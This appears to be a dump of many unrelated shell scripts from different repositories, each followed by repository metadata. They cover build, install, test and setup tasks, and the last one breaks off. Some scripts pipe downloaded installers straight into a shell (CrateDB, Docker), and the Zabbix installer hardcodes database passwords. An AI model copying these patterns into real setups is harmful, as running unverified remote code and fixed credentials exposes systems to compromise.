echo "double A_208Tl = 54*31.5 ; double A_214Bi = 0 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# measured bkg w Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 290*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
mv "InfluenceContaminations/results.txt" "InfluenceContaminations/results_Se_without_B.txt"
cp "contaminations/contaminations_nominales.h" "contaminations/contaminations.h"
cp "EventSelection/Cuts_perso_nom_B.h" "EventSelection/Cuts.h"
|
SuperNEMO-DBD/AllAnalyses
|
Cloe/SensitivityStudy-master/script_contaminations_aucun.sh
|
Shell
|
gpl-3.0
| 2,204 |
#!/bin/bash
GAMEDB=pokopoko_Game
LOGDB=pokopoko_Log
for ((i = 1; i < 11; i++));do
if [ $i != 10 ];then
echo "CREATE DATABASE ${GAMEDB}0$i character set utf8;"
echo "CREATE DATABASE ${LOGDB}0$i character set utf8;"
mysql -u root ${GAMEDB}0$i < pokopoko_Game.sql
mysql -u root ${LOGDB}0$i < pokopoko_Log.sql
else
echo "CREATE DATABASE ${GAMEDB}$i character set utf8;"
echo "CREATE DATABASE ${LOGDB}$i character set utf8;"
mysql -u root ${GAMEDB}$i < pokopoko_Game.sql
mysql -u root ${LOGDB}$i < pokopoko_Log.sql
fi
done
|
wapj/scripts
|
restore_reviewdb.sh
|
Shell
|
gpl-3.0
| 596 |
#!/bin/bash
LOG=/var/log/userdata/debian/$(basename ${0}).log
mkdir -p $(dirname ${LOG})
exec 1>${LOG} 2>&1
date
set
set -o verbose
set -o errtrace
set -o xtrace
cd /tmp
# CrateDB
bash -c "$(curl -L install.crate.io)"
echo done
exit 0
|
devopsomatic/aws
|
userdata/debian/cratedb.sh
|
Shell
|
gpl-3.0
| 239 |
#!/bin/bash
# OpenRA packaging script for versioned source tarball
if [ $# -ne "2" ]; then
echo "Usage: `basename $0` tag outputdir"
exit 1
fi
# Set the working dir to the location of this script
cd $(dirname $0)
TAG="$1"
OUTPUTDIR="$2"
SRCDIR="$(pwd)/../.."
pushd ${SRCDIR} > /dev/null
make version VERSION="${TAG}"
git ls-tree HEAD --name-only -r -z | xargs -0 tar cvjf "${OUTPUTDIR}/OpenRA-${TAG}-source.tar.bz2"
popd > /dev/null
|
LipkeGu/OpenRA
|
packaging/source/buildpackage.sh
|
Shell
|
gpl-3.0
| 445 |
#!/bin/sh
if [ -z $DESTDIR ]; then
echo 'Compiling GSchema'
glib-compile-schemas "$MESON_INSTALL_PREFIX/share/glib-2.0/schemas"
if [ "$1" = "false" ] # Was it lib-only?
then
echo 'Updating icon cache'
gtk-update-icon-cache -qtf "$MESON_INSTALL_PREFIX/share/icons/hicolor"
echo 'Updating desktop database'
update-desktop-database -q "$MESON_INSTALL_PREFIX/share/applications"
fi
fi
|
TingPing/irc-client
|
meson_post_install.sh
|
Shell
|
gpl-3.0
| 396 |
#!/bin/sh
if ! command -v wget
then
apt-eole install wget
fi
if ! command -v git
then
apt-eole install git
fi
if ! command -v make
then
apt-eole install make
fi
if ! command -v pip
then
apt-eole install python-pip
fi
if [ ! -d /usr/lib/python2.7/dist-packages/yaml ]
then
apt install -y python-yaml
fi
if ! command -v docker
then
wget -qO- https://get.docker.com/ | sh
usermod -aG docker arun
systemctl start docker
fi
if ! command -v docker-compose
then
pip install docker-compose
fi
if [ ! -d /etc/systemd/system/docker.service.d ]
then
mkdir -p /etc/systemd/system/docker.service.d
fi
apt-get install bridge-utils
#snap
if ! command -v snap
then
apt install -y snapd
fi
if ! command -v snapcraft
then
apt install -y snapcraft
fi
#vagrant
if [ ! -d /usr/lib/virtualbox ]
then
apt install virtualbox virtualbox-dkms
fi
if ! command -v vagrant
then
apt install vagrant
fi
apt autoremove -y
#lcx
|
GggEole/eole-meta-conteneurs
|
scripts/installPaquets.sh
|
Shell
|
gpl-3.0
| 926 |
DOCKER_NAME=
DOCKER_IMAGE=
STOP_HTTP=
RUN_SH="xhost +localhost"
DOCKER_RUN="--device /dev/snd -v /tmp/.X11-unix/X0:/tmp/.X11-unix/X0"
|
RolandKujundzic/rkdocker
|
gui/iceweasel/config.sh
|
Shell
|
gpl-3.0
| 135 |
# '.' this from indiviual test.sh files
if diff -b expected result
then printf "PASSED: $PWD\n\n"
else printf "FAILED: $PWD\n\n"; exit 1
fi
|
dcwbrown/olang
|
src/test/confidence/testresult.sh
|
Shell
|
gpl-3.0
| 140 |
#!/usr/bin/env bash
w="3600"
n="3"
d="5"
u="`id -u`" || exit
[[ "$u" == "0" ]] || exec sudo env DISPLAY="$DISPLAY" DBUS_SESSION_BUS_ADDRESS="$DBUS_SESSION_BUS_ADDRESS" "$0" "$@" || exit
# [[ "$u" == "0" ]] || exec time sudo "$0" "$@" || exit
s="/sys/power/state"
p="/sys/class/power_supply/AC/online"
[[ -e "$p" ]] || exit
g=( "gnome-screensaver-command" "--lock" )
[[ "$SUDO_USER" ]] && g=( "su" "-c" "env DISPLAY='$DISPLAY' DBUS_SESSION_BUS_ADDRESS='$DBUS_SESSION_BUS_ADDRESS' ${g[*]}" "$SUDO_USER" )
rtcwaker() {
which rtcwake &>/dev/null && rtcwake -u "$@"
}
rtcalarm() {
rtcwaker -m show
}
rtcsleep() {
local r
rtcalarm || r="$?"
rtcwaker -m disable || r="$?"
return "${r:-"0"}"
}
rtcsleep
while true
do
i="$n"
while true
do
sleep "$d"
a="`< "$p"`" || exit
[[ "$a" == "1" ]] && break
[[ "$a" == "0" ]] || exit
[[ "$((--i))" == "0" ]] && break
done
[[ "$a" == "1" ]] && continue
rtcalarm
rtcwaker -u -m no -s "$w"
"${g[@]}"
echo -n "Sleeping at: " && date -u
pm-suspend || echo mem | tee "$s" || exit
echo -n "Resuming at: " && date -u
rtcsleep
xset dpms force off
done
|
datgao/miscutil
|
p.sh
|
Shell
|
gpl-3.0
| 1,117 |
##! /bin/sh
# export DISPLAY=:0 PULSE_SERVER=tcp:127.0.0.1:4712
#startxfce4 &> 2
|
redjoker/nexus9_chroot
|
graphics.sh
|
Shell
|
gpl-3.0
| 81 |
#!/bin/sh
tar -xjvf multichase-1.tar.bz2
mv multichase multichase-bin
cd multichase-bin
echo "--- Makefile 2016-12-29 01:46:00.387366591 +0000
+++ Makefile.new 2016-12-29 01:45:54.284206284 +0000
@@ -11,7 +11,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-CFLAGS=-std=gnu99 -g -O2 -fomit-frame-pointer -fno-unroll-loops -Wall -Wstrict-prototypes -Wmissing-prototypes -Wshadow -Wmissing-declarations -Wnested-externs -Wpointer-arith -W -Wno-unused-parameter -Werror -pthread
+CFLAGS=-std=gnu99 -g -O2 -fomit-frame-pointer -fno-unroll-loops -Wall -Wstrict-prototypes -Wmissing-prototypes -Wshadow -Wmissing-declarations -Wnested-externs -Wpointer-arith -W -Wno-unused-parameter -pthread
LDFLAGS=-g -O2 -static -pthread
LDLIBS=-lrt
" | patch -p0
make
echo 0 > ~/test-exit-status
cd ~/
echo "#!/bin/sh
cd multichase-bin
./\$@ > \$LOG_FILE 2>&1
echo \$? > ~/test-exit-status" > multichase
chmod +x multichase
|
phoronix-test-suite/phoronix-test-suite
|
ob-cache/test-profiles/pts/multichase-1.0.2/install.sh
|
Shell
|
gpl-3.0
| 977 |
#!/usr/bin/env bash
# Aim: launch a functional test for the insilicut package
# Copyright (C) 2014 Institut National de la Recherche Agronomique (INRA)
# License: GPL-3+
# Author: Timothée Flutre
progVersion="1.0"
# Display the help on stdout.
# The format complies with help2man (http://www.gnu.org/s/help2man)
function help () {
msg="\`${0##*/}' launches a functional test for the insilicut package.\n"
msg+="\n"
msg+="Usage: ${0##*/} [OPTIONS] ...\n"
msg+="\n"
msg+="Options:\n"
msg+=" -h, --help\tdisplay the help and exit\n"
msg+=" -V, --version\toutput version information and exit\n"
msg+=" -v, --verbose\tverbosity level (0/default=1/2/3)\n"
msg+=" -i, --p2i\tabsolute path to the insilicut directory\n"
msg+=" -n, --noclean\tkeep temporary directory with all files\n"
msg+="\n"
msg+="Report bugs to <[email protected]>."
echo -e "$msg"
}
# Display version and license information on stdout.
function version () {
msg="${0##*/} ${progVersion}\n"
msg+="\n"
msg+="Copyright (C) 2014 Institut National de la Recherche Agronomique (INRA).\n"
msg+="License GPL-3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
msg+="This is free software; see the source for copying conditions. There is NO\n"
msg+="warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msg+="\n"
msg+="Written by Timothée Flutre."
echo -e "$msg"
}
# http://www.linuxjournal.com/content/use-date-command-measure-elapsed-time
function timer () {
if [[ $# -eq 0 ]]; then
echo $(date '+%s')
else
local startRawTime=$1
endRawTime=$(date '+%s')
if [[ -z "$startRawTime" ]]; then startRawTime=$endRawTime; fi
elapsed=$((endRawTime - startRawTime)) # in sec
nbDays=$((elapsed / 86400))
nbHours=$(((elapsed / 3600) % 24))
nbMins=$(((elapsed / 60) % 60))
nbSecs=$((elapsed % 60))
printf "%01dd %01dh %01dm %01ds" $nbDays $nbHours $nbMins $nbSecs
fi
}
# Parse the command-line arguments.
# http://stackoverflow.com/a/4300224/597069
function parseCmdLine () {
getopt -T > /dev/null # portability check (say, Linux or Mac OS?)
if [ $? -eq 4 ]; then # GNU enhanced getopt is available
TEMP=`getopt -o hVv:i:n -l help,version,verbose:,p2i:,noclean \
-n "$0" -- "$@"`
else # original getopt is available (no long options, whitespace, sorting)
TEMP=`getopt hVv:i:n "$@"`
fi
if [ $? -ne 0 ]; then
echo "ERROR: "$(which getopt)" failed"
getopt -T > /dev/null
if [ $? -ne 4 ]; then
echo "did you use long options? they are not handled \
on your system, use -h for help"
fi
exit 2
fi
eval set -- "$TEMP"
while [ $# -gt 0 ]; do
case "$1" in
-h | --help) help; exit 0; shift;;
-V | --version) version; exit 0; shift;;
-v | --verbose) verbose=$2; shift 2;;
-i | --p2i) pathToInsilicut=$2; shift 2;;
-n | --noclean) clean=false; shift;;
--) shift; break;;
*) echo "ERROR: options parsing failed, use -h for help"; exit 1;;
esac
done
if [ -z "${pathToInsilicut}" ]; then
echo -e "ERROR: missing compulsory option --p2i\n"
help
exit 1
fi
if [ ! -d "${pathToInsilicut}" ]; then
echo -e "ERROR: can't find directory ${pathToInsilicut}\n"
help
exit 1
fi
}
function run () {
cwd=$(pwd)
cd "${pathToInsilicut}/tests"
# step 1 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "prepare input data..."
fi
if [ ! -f "${pathToInsilicut}/tests/TAIR10_chr1.fas" ]; then
if [ $verbose -gt "0" ]; then
echo -e "download chromosome 1 from A. thaliana..."
fi
wget ftp://ftp.arabidopsis.org/home/tair/Sequences/whole_chromosomes/TAIR10_chr1.fas
fi
echo -e ">ApeKI\nGCWGC" > ApeKI.fa
# step 2 ------------------------------------------------------------------
uniqId=$$ # process ID
testDir=tmp_test_${uniqId}
rm -rf ${testDir}
mkdir ${testDir}
cd ${testDir}
if [ $verbose -gt "0" ]; then echo "temp dir: "$(pwd); fi
# step 3 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "launch insilicut..."
fi
${pathToInsilicut}/scripts/insilicut.bash --gf ../TAIR10_chr1.fas \
--gn Atha --ef ../ApeKI.fa --en ApeKI -v $(expr ${verbose} - 1) \
--p2i ${pathToInsilicut}
# step 4 ------------------------------------------------------------------
if [ $verbose -gt "0" ]; then
echo -e "check outputs..."
fi
if [ $(zcat out_patman_Atha_ApeKI_e-0_g-0_a_frags_s-100_S-300.bed.gz | wc -l) != 5968 ]; then
echo -e "test failed!"
exit 1
else
echo -e "test passed!"
fi
# step 5 ------------------------------------------------------------------
cd ${cwd}
if $clean; then rm -rf "${pathToInsilicut}/tests/${testDir}"; fi
}
verbose=1
pathToInsilicut=""
clean=true
parseCmdLine "$@"
if [ $verbose -gt "0" ]; then
startTime=$(timer)
msg="START ${0##*/} $(date +"%Y-%m-%d") $(date +"%H:%M:%S")"
msg+="\ncmd-line: $0 "$@ # comment if an option takes a glob as argument
msg+="\ncwd: $(pwd)"
echo -e $msg
fi
run pathToInsilicut clean
if [ $verbose -gt "0" ]; then
msg="END ${0##*/} $(date +"%Y-%m-%d") $(date +"%H:%M:%S")"
msg+=" ($(timer startTime))"
echo $msg
fi
|
timflutre/insilicut
|
tests/test_func.bash
|
Shell
|
gpl-3.0
| 5,332 |
#!/bin/bash
ACV="2.86"
ARC=".tar.gz"
APN="sysvinit"
export ACV ARC APN
ACB=$APN-$ACV
export ACB
#
# Sysvinit-2.86
#
##########################################
cd $LSB
$TC $LSR/$ACB$ARC
cd $ACB
sed -i 's@Sending processes@& configured via /etc/inittab@g' \
src/init.c
make -C src
make -C src install
cat > /etc/inittab << "EOF"
# Begin /etc/inittab
id:3:initdefault:
si::sysinit:/etc/rc.d/init.d/rc sysinit
l0:0:wait:/etc/rc.d/init.d/rc 0
l1:S1:wait:/etc/rc.d/init.d/rc 1
l2:2:wait:/etc/rc.d/init.d/rc 2
l3:3:wait:/etc/rc.d/init.d/rc 3
l4:4:wait:/etc/rc.d/init.d/rc 4
l5:5:wait:/etc/rc.d/init.d/rc 5
l6:6:wait:/etc/rc.d/init.d/rc 6
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
su:S016:once:/sbin/sulogin
1:2345:respawn:/sbin/agetty tty1 9600
2:2345:respawn:/sbin/agetty tty2 9600
3:2345:respawn:/sbin/agetty tty3 9600
4:2345:respawn:/sbin/agetty tty4 9600
5:2345:respawn:/sbin/agetty tty5 9600
6:2345:respawn:/sbin/agetty tty6 9600
# End /etc/inittab
EOF
|
buswellj/code
|
AppOS-Linux/abs-7.0.2/bldsys/scripts32/chroot/sysvinit_p4.sh
|
Shell
|
gpl-3.0
| 971 |
#!/bin/bash
# This script is used to generate the previews needed by the mod
# It requires blender with the latest python API (2.6x is tested)
# A script that works with older blenders and, maybe, without python, is available in older commits.
# This script can also use pngcrush and imagemagick to reduce output size,
# please enable them if you want to push to the git repository of the mod.
# Pngcrush output will be written to .previews/pngcrush_output
# Warning: any file in .previews/ and skins/textures might be deleted without asking.
PNGCRUSH=true
IMAGEMAGICK=true
cd .previews
rm ../skins/textures/*_preview*.png # Remove all previous previews
blender -b skin_previews.blend --python-text "Generate previews" > /dev/null
if $IMAGEMAGICK
then echo "Stripping metadata from generated files..."
else echo "Moving files..."
fi
rm -rf output # remove my output
mkdir -p output
for i in blender_out/character_*_00.png;
do
out_name=$(basename $i | sed -e 's/_00.png//g')
out_file=output/"$out_name"_preview.png
if $IMAGEMAGICK
then
convert -strip $i $out_file
else
mv $i $out_file
fi
done
for i in blender_out/character_*_01.png;
do
out_name=$(basename $i | sed -e 's/_01.png//g')
out_file=output/"$out_name"_preview_back.png
if $IMAGEMAGICK
then
convert -strip $i $out_file
else
mv $i $out_file
fi
done
if $PNGCRUSH
then
echo "Running pngcrush..."
pngcrush -d ../skins/textures/ output/*_preview*.png 2> pngcrush_output
else mv output/*_preview*.png ../skins/textures/
fi
echo "Done !"
|
linushsao/sky_islands_game-linus
|
mods/modmenu_linus/skins_linus/generate_previews.sh
|
Shell
|
gpl-3.0
| 1,520 |
#! /bin/bash
# Remove Oasis files
rm -rf configure libnewque_stubs.clib Makefile myocamlbuild.ml setup.data setup.ml _tags tmp
mkdir tmp
# Create new Oasis files
oasis setup
./configure
# Keep a copy of the stubs
cp tmp/libnewque_stubs.clib .
# Download rapidjson if missing
if [ ! -d "rapidjson" ]; then
echo 'Downloading rapidjson_v1.1.0'
wget -nv https://github.com/miloyip/rapidjson/archive/v1.1.0.tar.gz -O src/bindings/rapidjson_v1.1.0.tar.gz
tar xzf src/bindings/rapidjson_v1.1.0.tar.gz
mv rapidjson-1.1.0/include/rapidjson rapidjson
rm -rf rapidjson-1.1.0 src/bindings/rapidjson_v1.1.0.tar.gz
fi
echo 'Done'
|
bradstimpson/newque
|
scripts/setup.sh
|
Shell
|
mpl-2.0
| 630 |
#!/bin/bash
PROG=$1
eval "/usr/bin/time -l 2>&1 ./$PROG | grep maximum"
|
awf/Coconut
|
Scripts/memusg.sh
|
Shell
|
mpl-2.0
| 72 |
#!/bin/bash
################################################################################
#
# Script to install Zabbix Agent and Server on a Ubuntu 14.04 vanilla system
#
# Copyright Samuel Cozannet 2014
# Maintainer: Samuel Cozannet <[email protected]>
#
################################################################################
set -x
# Configuring default versions
VERSION="2.2"
DISTRIBUTION="ubuntu"
DIST="trusty"
APT_KEY="D13D58E479EA5ED4"
APT_SRV="keys.gnupg.net"
# Warning this default pass is also hard-coded at the end cuz I've been lazy.
MYSQL_PASS="ubuntu"
START_DB="zabbix_ob.sql"
# START_DB="zabbix_full.sql"
### Pre requisite
# Using default repository for latest Zabbix binaries
echo "deb http://repo.zabbixzone.com/zabbix/${VERSION}/${DISTRIBUTION}/ ${DIST} main contrib non-free" | tee /etc/apt/sources.list.d/zabbix.list
apt-key adv --keyserver ${APT_SRV} --recv-keys ${APT_KEY}
# Adding the multiverse repos
echo "deb http://us.archive.ubuntu.com/ubuntu/ ${DIST} multiverse" | tee -a /etc/apt/sources.list.d/multiverse.list
echo "deb http://us.archive.ubuntu.com/ubuntu/ ${DIST}-updates multiverse" | tee -a /etc/apt/sources.list.d/multiverse.list
# Updating local repos
apt-get update -qq
# Compilation (uncomment if you want to build from sources)
# apt-get install -y -qq gcc libmagic1 build-essential pkg-config
# OpenIPMI
apt-get install -y -qq openipmi libopenipmi-dev
# CURL
apt-get install -y -qq libcurl4-openssl-dev
# SNMP
apt-get install -y -qq libsnmp-dev snmp snmptt snmpd libsnmp-base libsnmp-perl libsnmp30 libsnmp-mib-compiler-perl libsnmp-base libsnmp-dev
# SNMP from multiverse (in case it fails will not remove other snmp packages)
apt-get install -y -qq snmp-mibs-downloader
# Jabber
apt-get install -y -qq libiksemel-dev libiksemel3 libiksemel-utils
# MySQL
apt-get install -y -qq mysql-client libmysqlclient15-dev
# SSL & SSH
apt-get install -y -qq libssl-dev libssh2-1-dev
# Networking & Stuff
apt-get install -y -qq fping wakeonlan ntp bc
# AMT Terminal
apt-get install -y -qq amtterm
sed -i.bak 's/^mibs\ \:/#\ mibs\ \:/' /etc/snmp/snmp.conf
# Stuff
apt-get install -y -qq htop openssl shellinabox eggdrop expect
# Install ncftp
apt-get install -y -qq ncftp
# Networking
apt-get install -y -qq tshark nmap
groupadd wireshark
usermod -a -G wireshark $USERNAME
chgrp wireshark /usr/bin/dumpcap
chmod 750 /usr/bin/dumpcap
setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
# This line verifies the result. Uncomment if want to check
# getcap /usr/bin/dumpcap
# Note leaving the session is required. Will work after a reboot
# CVS & Code Systems
apt-get install -y -qq git bzr python-pip
### Final touch
echo "We are now ready to install Zabbix.."
echo .
# Installing Zabbix
sed -i.bak "s/MYSQL_PASS/${MYSQL_PASS}/g" ./mysql_ob.preseed
debconf-set-selections ./mysql_ob.preseed
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq --force-yes mysql-server-5.5
sed -i.bak "s/MYSQL_PASS/${MYSQL_PASS}/g" ./zabbix_ob.preseed
debconf-set-selections ./zabbix_ob.preseed
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq --force-yes zabbix-server-mysql
apt-get install -y -qq zabbix-frontend-php zabbix-java-gateway zabbix-agent zabbix-get zabbix-sender php5-mysql
# Add the timezone to php.ini
sed -i.bak 's/^;date\.timezone\ =/date\.timezone\ = Europe\/Paris/' /etc/php5/apache2/php.ini
# Set default configuration
cp -f ./zabbix.conf_ob.php /etc/zabbix/web/zabbix.conf.php
service apache2 restart
# Import default DB
service zabbix-server stop
sleep 1
mysql -uroot -pubuntu zabbix < ./${START_DB}
sleep 1
service zabbix-server start
# Prepare for agent MySQL querying
# Reference: http://blog.themilkyway.org/2013/11/how-to-monitor-mysql-using-the-new-zabbix-template-app-mysql/
# This needs a fix to implement the MYSQL_PASS above
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'127.0.0.1' IDENTIFIED BY 'ubuntu'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'localhost' IDENTIFIED BY 'ubuntu'"
# I don't know if there is a bug here but the agent also requires the below
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'ubuntu'@'127.0.0.1'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'ubuntu'@'localhost'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'127.0.0.1'"
mysql -uroot -p${MYSQL_PASS} -e"GRANT USAGE ON *.* TO 'zabbix'@'localhost'"
mysql -uroot -pubuntu -e"flush privileges"
cp ./my.cnf /etc/zabbix/.my.cnf
service zabbix-agent restart
# Now copy External scripts
cp ./usr/lib/zabbix/externalscripts/* /usr/lib/zabbix/externalscripts/
cp ./usr/lib/zabbix/alertscripts/* /usr/lib/zabbix/alertscripts/
mv /usr/lib/zabbix/externalscripts/jujuapi.yaml /usr/lib/zabbix/externalscripts/.jujuapi.yaml
mv /usr/lib/zabbix/externalscripts/zabbixapi.yaml /usr/lib/zabbix/externalscripts/.zabbixapi.yaml
chmod +x /usr/lib/zabbix/externalscripts/*
chmod +x /usr/lib/zabbix/alertscripts/*
chown zabbix:zabbix /usr/lib/zabbix/externalscripts/*
chown zabbix:zabbix /usr/lib/zabbix/alertscripts/*
# Installing a local Zabbix API tool
pip install pyzabbix
|
SaMnCo/ob-zabbix
|
install-zabbix-server.sh
|
Shell
|
agpl-3.0
| 5,117 |
#!/bin/bash
VIRTUAL_MACHINE_IP=$(echo "$DOCKER_HOST" | grep -Eo '([0-9]*\.){3}[0-9]*')
echo
echo "* This script is intended for Mac."
echo
echo "The server have to connect the db container via the IP of the virtual machine."
echo "The virtual machine IP is: $VIRTUAL_MACHINE_IP"
echo
DATABASE_URL=postgres://smartbirds:secret@$VIRTUAL_MACHINE_IP:5432/smartbirds npm start
|
BspbOrg/smartbirds-server
|
mac-npm-run.sh
|
Shell
|
agpl-3.0
| 376 |
#!/usr/bin/dumb-init /bin/bash
. /env.sh
for var in ${!DEFAULT_KAM*}; do
t=${var/DEFAULT_/}
if [ -z ${!t} ]; then
echo "Using default for ${t}:${!var}"
eval ${t}=${!var}
export "${t}"
else
echo "Using override value for ${t}"
fi
done
for var in ${!KAM_*}; do
if [[ $var == KAM_* && "${var}" != "KAM_DISPATCHER_ROUTES" ]]; then
if [[ $var == KAM_DEFINE_* && ${!var} != "false" ]]; then
echo "#!define ${var/KAM_DEFINE_/} \"${!var}\"" >> "/etc/kamailio/kamailio-local.cfg"
fi
fi
done
exec "${@}"
|
mwolff44/pyfreebilling
|
compose/production/kamailio/run.sh
|
Shell
|
agpl-3.0
| 541 |
#!/bin/bash
# Copyright 2013,2014 Marko Dimjašević, Simone Atzeni, Ivo Ugrina, Zvonimir Rakamarić
#
# This file is part of maline.
#
# maline is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# maline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with maline. If not, see <http://www.gnu.org/licenses/>.
ADB_PORT="$1"
ADB_SERVER_PORT="$2"
SH_SCRIPT="$3"
SH_SCRIPT_IN_ANDROID="$4"
STATUS_FILE=$MALINE/.emulator-$ADB_PORT
# Clean up upon exiting from the process
function __sig_func {
kill $ADB_PID &>/dev/null
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
exit 1
}
die() {
echo >&2 "$@"
exit 1
}
function wait_for_emu {
COUNTER=0
COUNTER_LIMIT=2
EMU_READY=0
echo "0" > $STATUS_FILE
echo -n "Waiting for the device: "
CURR_TIME=$((`date +"%s"`))
TIME_TIMEOUT=$(($CURR_TIME + $EMU_TIMEOUT))
while [ "$EMU_READY" != "1" ] && [ "$CURR_TIME" -lt "$TIME_TIMEOUT" ]; do
echo -n "."
sleep 3s
if [ $COUNTER -eq $COUNTER_LIMIT ]; then
let COUNTER=0
adb -P $ADB_SERVER_PORT -e disconnect localhost:$ADB_PORT &>/dev/null
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
adb -P $ADB_SERVER_PORT start-server &>/dev/null &
ADB_PID=$!
fi
adb -P $ADB_SERVER_PORT -e connect localhost:$ADB_PORT &>/dev/null
EMU_READY=`timeout 5 adb -P $ADB_SERVER_PORT -e -s localhost:$ADB_PORT shell getprop dev.bootcomplete 2>&1`
EMU_READY=${EMU_READY:0:1}
let COUNTER=COUNTER+1
CURR_TIME=$((`date +"%s"`))
done
if [ "$EMU_READY" = "1" ]; then
echo " ready"
echo "1" > $STATUS_FILE
else
echo " failed"
fi
}
# Set traps
trap __sig_func SIGQUIT
trap __sig_func SIGKILL
trap __sig_func SIGTERM
# Kill the adb server
adb -P $ADB_SERVER_PORT kill-server &>/dev/null
ADB_PID=`ps -ef | grep "adb -P $ADB_SERVER_PORT" | head -1 | awk -F" " '{print $2}' | tr "\n" " "`
kill $ADB_PID &>/dev/null
# Start an adb server
adb -P $ADB_SERVER_PORT start-server &>/dev/null &
ADB_PID=$!
# TODO: Change this parameter if ARM is ever to be supported again or
# if running on a slower machine
EMU_TIMEOUT=180
# Wait for the device
wait_for_emu
if [ "`cat $STATUS_FILE 2>/dev/null`" != "1" ]; then
exit 0
fi
# Push a patched version of Monkey to the device. We need to do this
# because we are using a prebuilt image of x86, which doesn't come
# with the patched version of Monkey. Do the same with a tiny shell
# script that starts the app and traces its system calls.
JAR="$ANDROID_SDK_ROOT/monkey/monkey.jar"
ODEX="$ANDROID_SDK_ROOT/monkey/monkey.odex"
[ -f $JAR ] || die "$JAR file does not exist. Use a custom build of Android SDK pointed to in the documentation."
[ -f $ODEX ] || die "$ODEX file does not exist. Use a custom build of Android SDK pointed to in the documentation."
echo -n "Pushing a patched version of Monkey... "
let COUNTER=0
OK=0
while [ $OK -eq 0 ] && [ "$COUNTER" -lt 3 ]; do
OK=1
adb -P $ADB_SERVER_PORT shell mount -o rw,remount /system &>/dev/null || OK=0
sleep 1
adb -P $ADB_SERVER_PORT push $JAR /system/framework &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT push $ODEX /system/framework &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT push $SH_SCRIPT $SH_SCRIPT_IN_ANDROID &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT shell chmod 6755 $SH_SCRIPT_IN_ANDROID &>/dev/null || OK=0
sleep 1
adb -P $ADB_SERVER_PORT shell mount -o ro,remount /system &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT -e connect localhost:$ADB_PORT &>/dev/null || OK=0
let COUNTER=COUNTER+1
done
if [ $OK -eq 1 ]; then
echo "done"
else
echo "failed"
exit 1
fi
echo ""
exit 0
|
soarlab/maline
|
src/get_emu_ready.sh
|
Shell
|
agpl-3.0
| 4,084 |
#!/bin/sh
set -e
color() {
printf '\033[%sm%s\033[m\n' "$@"
# usage color "31;5" "string"
# 0 default
# 5 blink, 1 strong, 4 underlined
# fg: 31 red, 32 green, 33 yellow, 34 blue, 35 purple, 36 cyan, 37 white
# bg: 40 black, 41 red, 44 blue, 45 purple
}
color '36;1' "
_____ _
|_ _| | |
| | _ __ | |__ _____ __
| | | '_ \| '_ \ / _ \ \/ /
_| |_| | | | |_) | (_) > <
|_____|_| |_|_.__/ \___/_/\_\\
This script installs dependencies for Inbox.
For more details, visit:
https://www.github.com/inboxapp/inbox
"
color '35;1' 'Updating packages...'
apt-get update
apt-get -y install python-software-properties
# Preconfigure MySQL root password
echo "mysql-server mysql-server/root_password password root" | debconf-set-selections
echo "mysql-server mysql-server/root_password_again password root" | debconf-set-selections
color '35;1' 'Installing dependencies from apt-get...'
apt-get -y install git \
wget \
supervisor \
mysql-server \
mysql-client \
redis-server \
python \
python-dev \
python-pip \
python-setuptools \
build-essential \
libmysqlclient-dev \
gcc \
libzmq-dev \
libxml2-dev \
libxslt-dev \
lib32z1-dev \
libffi-dev \
python-lxml \
tmux \
curl \
color '35;1' 'Installing dependencies from pip...'
pip install --upgrade setuptools
pip install -r requirements.txt
pip install -e .
if [ -d "../inbox-eas" ]; then
pip install -e ../inbox-eas
fi
color '35;1' 'Finished installing dependencies.'
mkdir -p /etc/inboxapp
chown $SUDO_USER /etc/inboxapp
color '35;1' 'Copying default development configuration to /etc/inboxapp'
cp ./etc/config-dev.json /etc/inboxapp/config.json
# Mysql config
cp ./etc/my.cnf /etc/mysql/conf.d/inboxapp.cnf
mysqld_safe &
sleep 10
color '35;1' 'Creating databases...'
python bin/create-db
find . -name \*.pyc -delete
color '35;1' 'Cleaning up...'
apt-get -y purge build-essential
apt-get -y autoremove
mkdir -p /var/lib/inboxapp
chown $SUDO_USER /var/lib/inboxapp
mkdir -p /var/log/inboxapp
chown $SUDO_USER /var/log/inboxapp
git config branch.master.rebase true
color '35;1' 'Done!.'
|
abhishekgahlot/inbox
|
setup.sh
|
Shell
|
agpl-3.0
| 2,536 |
#!/bin/bash
git clone https://github.com/open-source-parsers/jsoncpp.git
cd jsoncpp
mkdir -p build/debug
cd build/debug
